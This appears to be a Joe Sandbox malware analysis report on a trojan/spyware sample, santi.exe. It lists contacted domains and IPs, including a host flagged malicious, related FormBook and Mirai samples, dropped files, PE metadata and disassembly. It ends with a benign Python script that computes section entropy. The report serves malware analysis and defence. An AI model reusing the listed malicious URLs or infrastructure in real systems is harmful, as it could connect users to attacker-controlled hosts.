                                      http://www.395608.men/vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/search?q= | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt | msdt.exe, 0000000B.00000002.3133665309.00000000052B6000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003746000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.espiritismo.info | lavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/ | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://t.me/NVission | firefox.exe, 00000010.00000002.2038827866.000000000A714000.00000004.80000000.00040000.00000000.sdmp | false | - | high
http://www.gmx.net/produkte/homepage-mail/homepage-parken/ | msdt.exe, 0000000B.00000002.3133665309.000000000576C000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003BFC000.00000004.00000001.00040000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.18.73.116 | www.losmason.shop | United States | 13335 | CLOUDFLARENETUS | true
90.156.201.74 | www.n-vis.group | Russian Federation | 25532 | MASTERHOST-ASMoscowRussiaRU | false
13.248.169.48 | www.lirio.shop | United States | 16509 | AMAZON-02US | false
207.148.38.19 | 5w23j7d4.n.fly8899.com | Hong Kong | 59371 | DNC-ASDimensionNetworkCommunicationLimitedHK | false
104.21.88.139 | www.incgruporxat.click | United States | 13335 | CLOUDFLARENETUS | false
62.116.130.8 | www.gkfundeis.net | Germany | 15456 | INTERNETX-ASDE | false
185.106.208.3 | holytur.net | Turkey | 42846 | GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTR | false
3.33.130.190 | espiritismo.info | United States | 8987 | AMAZONEXPANSIONGB | false
66.29.148.78 | dialagiaja18.buzz | United States | 19538 | ADVANTAGECOMUS | false
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1561742
                                                              Start date and time:2024-11-24 08:32:50 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 42s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
Number of new started processes analysed:17
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:2
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:santi.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@10/9
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 96%
                                                              • Number of executed functions: 46
                                                              • Number of non-executed functions: 304
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target lavilIyGJqg.exe, PID 1292 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.18.73.116 | http://www.toolfriendonline.com | malicious | Unknown | www.toolfriendonline.com/
104.18.73.116 | http://nigoovip.com | malicious | Unknown | nigoovip.com/
13.248.169.48 | PAYROLL LIST.exe | malicious | FormBook | www.optimismbank.xyz/98j3/
13.248.169.48 | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.tals.xyz/cpgr/
13.248.169.48 | VSP469620.exe | malicious | FormBook | www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
13.248.169.48 | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.tals.xyz/cpgr/
13.248.169.48 | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | www.tals.xyz/stx5/
13.248.169.48 | Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | malicious | FormBook | www.tals.xyz/k1td/
13.248.169.48 | DOC_114542366.vbe | malicious | FormBook | www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
13.248.169.48 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.remedies.pro/hrap/
13.248.169.48 | SWIFT COPY 0028_pdf.exe | malicious | FormBook | www.optimismbank.xyz/lnyv/
13.248.169.48 | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | ZjH6H6xqo7.exe | malicious | LummaC | 104.21.47.136
CLOUDFLARENETUS | PAYROLL LIST.exe | malicious | FormBook | 104.21.40.167
CLOUDFLARENETUS | file.exe | malicious | FormBook | 172.67.186.192
CLOUDFLARENETUS | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.168.228
CLOUDFLARENETUS | CargoInvoice_Outstanding_56789_2024-11-21.vbs | malicious | Remcos, GuLoader | 172.67.191.199
CLOUDFLARENETUS | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | VSP469620.exe | malicious | FormBook | 104.21.44.16
CLOUDFLARENETUS | purchase Order.exe | malicious | FormBook | 172.67.145.234
CLOUDFLARENETUS | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.168.228
CLOUDFLARENETUS | Papyment_Advice.exe | malicious | MassLogger RAT | 104.21.67.152
MASTERHOST-ASMoscowRussiaRU | arm.nn-20241122-0008.elf | malicious | Mirai, Okiru | 217.16.29.179
MASTERHOST-ASMoscowRussiaRU | arm4.elf | malicious | Mirai | 84.252.144.212
MASTERHOST-ASMoscowRussiaRU | U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig | 90.156.163.55
MASTERHOST-ASMoscowRussiaRU | sora.ppc.elf | malicious | Mirai | 90.156.146.158
MASTERHOST-ASMoscowRussiaRU | ukOlLduCBM.exe | malicious | Phorpiex, Xmrig | 90.156.163.10
MASTERHOST-ASMoscowRussiaRU | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 90.156.162.79
MASTERHOST-ASMoscowRussiaRU | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 90.156.160.86
MASTERHOST-ASMoscowRussiaRU | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 90.156.160.66
MASTERHOST-ASMoscowRussiaRU | la.bot.arm5.elf | malicious | Unknown | 90.156.164.196
MASTERHOST-ASMoscowRussiaRU | arm7.elf | malicious | Unknown | 84.252.144.208
AMAZON-02US | PAYROLL LIST.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 13.248.221.243
AMAZON-02US | VSP469620.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 76.223.74.74
AMAZON-02US | arm7.nn.elf | malicious | Mirai, Okiru | 3.122.148.244
AMAZON-02US | arm5.nn.elf | malicious | Mirai, Okiru | 13.223.155.145
AMAZON-02US | sparc.nn.elf | malicious | Mirai, Okiru | 18.243.54.8
AMAZON-02US | arm.nn.elf | malicious | Mirai, Okiru | 15.206.178.249
AMAZON-02US | x86_32.nn.elf | malicious | Mirai, Okiru | 3.99.230.17
AMAZON-02US | file.exe | malicious | Amadey, Stealc, Vidar | 3.167.69.129
DNC-ASDimensionNetworkCommunicationLimitedHK | FzmC0FwV6y.exe | malicious | FormBook | 46.149.198.158
DNC-ASDimensionNetworkCommunicationLimitedHK | wODub61gZe.exe | malicious | FormBook | 147.92.40.175
DNC-ASDimensionNetworkCommunicationLimitedHK | ffsBbRe8UN.exe | malicious | FormBook | 147.92.40.174
DNC-ASDimensionNetworkCommunicationLimitedHK | la.bot.arm.elf | malicious | Unknown | 66.233.187.82
DNC-ASDimensionNetworkCommunicationLimitedHK | T9W7MCS2HI.exe | malicious | FormBook | 147.92.40.174
DNC-ASDimensionNetworkCommunicationLimitedHK | 970Qh1XiFt.elf | malicious | Mirai, Okiru | 66.233.31.204
DNC-ASDimensionNetworkCommunicationLimitedHK | http://wap.smarthomehungary.com/ | malicious | Unknown | 67.211.66.98
DNC-ASDimensionNetworkCommunicationLimitedHK | UPDATED Q-LOT24038.exe | malicious | FormBook | 147.92.40.174
DNC-ASDimensionNetworkCommunicationLimitedHK | hH4dbIGfGT.exe | malicious | FormBook | 147.92.40.175
DNC-ASDimensionNetworkCommunicationLimitedHK | Fvqw64NU4k.exe | malicious | FormBook | 103.248.137.209
                                                              No context
                                                              No context
                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1215420383712111
                                                              Encrypted:false
                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\santi.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):288256
                                                              Entropy (8bit):7.993998697501262
                                                              Encrypted:true
                                                              SSDEEP:6144:Dgsgoqv6Ac6PSIgc28laeDsXOxk6dh2rOAVM71a5FuCUZx/VznAStHXO:DgFVSIPRY8YevxkQ2rOaMZqNUZx/uS3O
                                                              MD5:F5D487101F22D75949BB2D06D8F2661F
                                                              SHA1:A4DD881DE5FF121373E8130D21DC55FC4B24C66E
                                                              SHA-256:9C2571E6ACAAD3D8FEF4A4CC0B94553CCE3E87E9DC9CC317057992A96C46EFB8
                                                              SHA-512:1EFA099F54589C135D3219659D817A6691EC2E835B333ACC3C0DF5617090B1643FF521CE19E6EE976B0FC4041D6DD393140FD20BC91F464D883FD044673819A3
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...CRJX6UCW3..6M.PZTWBBC.JX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT.BBC_U.8Q.^.k.7..q.<>1b3#%?D0.wP+_X"Cp81w07-q#6.....'^R(.]W^sBBCQJX6(B^.wQQ..0=.j"%.K...k#0.P....0=.M..m*?..*4[wQQ.7PZTWBBC..X6.BV3|x..7PZTWBBC.JZ7ZB\3Je2M7PZTWBBC._X6QSW3JA2M7P.TWRBCQHX6WCW3J16M1PZTWBBCQ:\6QAW3J16M5P..WBRCQZX6QCG3J!6M7PZTGBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3dES5CPZTS.FCQZX6Q.S3J!6M7PZTWBBCQJX6qCWSJ16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT
                                                              Process:C:\Users\user\Desktop\santi.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):288256
                                                              Entropy (8bit):7.993998697501262
                                                              Encrypted:true
                                                              SSDEEP:6144:Dgsgoqv6Ac6PSIgc28laeDsXOxk6dh2rOAVM71a5FuCUZx/VznAStHXO:DgFVSIPRY8YevxkQ2rOaMZqNUZx/uS3O
                                                              MD5:F5D487101F22D75949BB2D06D8F2661F
                                                              SHA1:A4DD881DE5FF121373E8130D21DC55FC4B24C66E
                                                              SHA-256:9C2571E6ACAAD3D8FEF4A4CC0B94553CCE3E87E9DC9CC317057992A96C46EFB8
                                                              SHA-512:1EFA099F54589C135D3219659D817A6691EC2E835B333ACC3C0DF5617090B1643FF521CE19E6EE976B0FC4041D6DD393140FD20BC91F464D883FD044673819A3
                                                              Malicious:false
                                                              Preview:...CRJX6UCW3..6M.PZTWBBC.JX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT.BBC_U.8Q.^.k.7..q.<>1b3#%?D0.wP+_X"Cp81w07-q#6.....'^R(.]W^sBBCQJX6(B^.wQQ..0=.j"%.K...k#0.P....0=.M..m*?..*4[wQQ.7PZTWBBC..X6.BV3|x..7PZTWBBC.JZ7ZB\3Je2M7PZTWBBC._X6QSW3JA2M7P.TWRBCQHX6WCW3J16M1PZTWBBCQ:\6QAW3J16M5P..WBRCQZX6QCG3J!6M7PZTGBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3dES5CPZTS.FCQZX6Q.S3J!6M7PZTWBBCQJX6qCWSJ16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.149862359107822
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:santi.exe
                                                              File size:1'214'464 bytes
                                                              MD5:c086de804062f1c6ebf2e42057187b24
                                                              SHA1:8f57ba2121877ecae5a800b28f2fc89421485d1f
                                                              SHA256:a538495e66f9396821392539284e4752ef3569f1d1f7b592cb438908b6c93efa
SHA512: fbbde874435c11e8b46dd8ef2b5609226480894e129a40bd185b23504391aec7cfb90aef1d8dbd9d7cb13b7c47a5d484ffba9ab88df84c2778aa880c874b00ec
SSDEEP: 24576:Xtb20pkaCqT5TBWgNQ7aK3rWXK/5QI8qD8nBSh6A:UVg5tQ7aK3rSv44ns5
TLSH: D045D01273DD8361C3B25273BA26B711BE7B782506B5F46B2FD8093DF920162521EA73
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x674068DC [Fri Nov 22 11:19:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007F7FCD15027Fh
jmp 00007F7FCD143294h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F7FCD14341Ah
cmp edi, eax
jc 00007F7FCD14377Eh
bt dword ptr [004C0158h], 01h
jnc 00007F7FCD143419h
rep movsb
jmp 00007F7FCD14372Ch
cmp ecx, 00000080h
jc 00007F7FCD1435E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7FCD143420h
bt dword ptr [004BA370h], 01h
jc 00007F7FCD1438F0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F7FCD1435BDh
test edi, 00000003h
jne 00007F7FCD1435CEh
test esi, 00000003h
jne 00007F7FCD1435ADh
bt edi, 02h
jnc 00007F7FCD14341Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7FCD143423h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F7FCD143475h
bt esi, 03h
jnc 00007F7FCD1434C8h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f7a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5f7a0 | 0x5f800 | 702b1c16d5f920c505ae406c06ebddb1 | False | 0.9333560004908377 | data | 7.906166415871796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
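Two things in the section table are worth checking by hand: every Raw Size is the Virtual Size rounded up to the 0x200 file alignment (0x8b54f becomes 0x8b600; .data is the exception, its 0x6200 on disk being smaller than its 0x9d54 in memory because the uninitialised tail is not stored), and .rsrc carries an entropy of 7.9 with a zlib ratio of 0.93, which is the signature of a section that is mostly opaque, already-compressed or encrypted bytes. The following script, an added illustration and not Joe Sandbox code, walks a PE section table with only the standard library and recomputes those columns (virtual/raw sizes, MD5, Shannon entropy and a zlib compressed/original ratio). The ratio is assumed to be what the report calls "ZLIB Complexity"; a value at or above 1.0 means the data does not compress at all. The PE image it parses is constructed in memory so the script runs offline; point parse_sections at open(path, "rb").read() to run it on a real file.

```python
import hashlib
import math
import struct
import zlib

FILE_ALIGN = 0x200    # FileAlignment: why Raw Size is Virtual Size rounded up to 0x200
SECT_ALIGN = 0x1000   # SectionAlignment: why section VAs start on 4 KiB boundaries


def align_up(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, approaching 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_ratio(data: bytes) -> float:
    """Compressed size over original size (assumed to match the report's
    "ZLIB Complexity").  Near or above 1.0 means already compressed/encrypted."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def build_pe(sections):
    """Construct a minimal 32-bit PE image from (name, payload, characteristics)."""
    n = len(sections)
    hdr_size = align_up(0x40 + 4 + 20 + 0xE0 + 40 * n, FILE_ALIGN)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x0122)  # i386; EXECUTABLE|LARGE_ADDRESS_AWARE|32BIT
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                        # ImageBase
    struct.pack_into("<II", opt, 32, SECT_ALIGN, FILE_ALIGN)
    struct.pack_into("<H", opt, 68, 2)                               # Subsystem: windows gui
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    table, body, va, raw = bytearray(), bytearray(), SECT_ALIGN, hdr_size
    for name, payload, flags in sections:
        raw_size = align_up(len(payload), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name, len(payload), va, raw_size, raw, 0, 0, 0, 0, flags)
        body += payload + b"\0" * (raw_size - len(payload))          # zero padding to file alignment
        va = align_up(va + len(payload), SECT_ALIGN)
        raw += raw_size
    struct.pack_into("<I", opt, 56, va)                              # SizeOfImage
    struct.pack_into("<I", opt, 60, hdr_size)                        # SizeOfHeaders
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return head + b"\0" * (hdr_size - len(head)) + bytes(body)


def parse_sections(pe: bytes):
    """Walk the section table and compute the per-section columns of the report."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]          # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]     # COFF SizeOfOptionalHeader
    first = e_lfanew + 24 + opt_size                               # section table follows the optional header
    rows = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", pe, first + 40 * i)
        data = pe[rptr:rptr + rsize]                               # the on-disk bytes, padding included
        rows.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": rsize, "flags": flags,
            "md5": hashlib.md5(data).hexdigest(),
            "entropy": round(shannon_entropy(data), 4),
            "zlib": round(zlib_ratio(data), 4),
        })
    return rows


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler standing in for packed or encrypted bytes."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed sample, not the analysed binary: high-entropy code, a mostly-zero
# data section and an incompressible resource blob.
SAMPLE_PE = build_pe([
    (b".text", pseudo_random(0x1234), 0x60000020),
    (b".data", b"\0" * 0x800 + b"ABCD" * 4, 0xC0000040),
    (b".rsrc", pseudo_random(0x2000, b"blob"), 0x40000040),
])

if __name__ == "__main__":
    for s in parse_sections(SAMPLE_PE):
        print(f"{s['name']:<7} va={s['va']:#08x} vsize={s['vsize']:#07x} raw={s['raw_size']:#07x} "
              f"md5={s['md5']} zlib={s['zlib']:.4f} entropy={s['entropy']:.4f}")
```

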